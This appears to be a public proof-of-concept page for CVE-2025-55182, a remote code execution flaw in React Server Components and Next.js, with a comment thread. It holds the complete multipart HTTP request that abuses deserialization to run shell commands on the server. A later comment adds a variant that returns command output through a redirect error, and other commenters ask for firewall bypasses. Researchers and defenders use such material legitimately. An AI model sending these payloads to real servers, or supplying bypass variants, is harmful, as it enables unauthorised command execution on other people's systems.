CVE-2025-55182 React Server Components RCE POC

README.md

POC for CVE-2025-55182 that works on Next.js 16.0.6

Core idea

Use the $@ deserialization to get a Chunk reference, and put Chunk.prototype.then as the then property of the root object. Then then would be invoked with root object as this/chunk when it is awaited/resolved.

By setting the status to RESOLVED_MODEL, now we can call initializeModelChunk with a fake chunk that is comlpetely in our control. This is particularly useful since itself and its related functions call many methods from the chunk._response object.

Exploit

The target is to trigger the Blob deserialization, which calls response._formData.get with payload from response._prefix and return the result directly. So all we need is to set response._formData.get to Function so the returned result would be a function with attacker controlled code, then put that to then again so it would be executed.

CVE-2025-55182.http

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

6

吓的我关闭了服务器

niubi

good job

wow

how to extract
Next-Action: x
ID

is it possible to return the result of executing a command in response to a request? You will not be able to send to the collaborator due to network restrictions.

E Z one

牛逼

is it possible to return the result of executing a command in response to a request?

@EvtDanya
Yes, it's possible to return the result of executing a command in response to a request. You can find the relevant payload here.

@Malayke That's clever, throwing the output itself as error.

牛逼

Dockerized Lab:

https://github.com/l4rm4nd/CVE-2025-55182

Nice work! I wrote this article about a couple of takeaways we can learn from this to avoid making similar mistakes in our own code.

📄 User-controlled Keys Considered Harmful - Two Important Takeaways from CVE-2025-55182

holy shit it works...

1337

wow ! congratulations !!

@EvtDanya Yes, it's possible to return the result of executing a command in response to a request. You can find the relevant payload here.

Nice, thanks :)

@Malayke is there is any bypasses for waf? like vercell waf

awesome!

1337

holy cow

牛逼

what happen?

it is giving me this error

sent

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Accept-Encoding: gzip, deflate, br
Accept: /
Connection: keep-alive
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 689

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{"then":"$B1337"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: NEXT_REDIRECT;push;/login?a=${res};307;});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

response

HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-store, must-revalidate
Content-Type: text/x-component
Date: Wed, 10 Dec 2025 10:27:31 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 301

:N1765362450970.6902
0:{"a":"$@1","f":"","b":"development"}
1:D{"time":6.808100000023842}
1:E{"digest":"1681718686","name":"Error","message":"Command failed: id\n'id' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n","stack":[],"env":"Server","owner":null}

@Codinplus31

:N1765362450970.6902 0:{"a":"$@1","f":"","b":"development"} 1:D{"time":6.808100000023842} 1:E{"digest":"1681718686","name":"Error","message":"Command failed: id\n'id' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n","stack":[],"env":"Server","owner":null}

That sure looks like the 'id' command that your exploit code is running with execSync() isn't available to your process; try other commands? Perhaps it's not even running on a Linux host?

In fact, "'[command]' is not recognized as an internal or external command" is a classic indicator of a Windows environment.

I'm using windows. How can I get through the error ?

Holyshittt!!

@Codinplus31 you're seeing a windows batch env error and saying it doesn't work XD

Hey!

Is there any poc with application/x-www-form-urlencoded not multipart/form-data content-type ??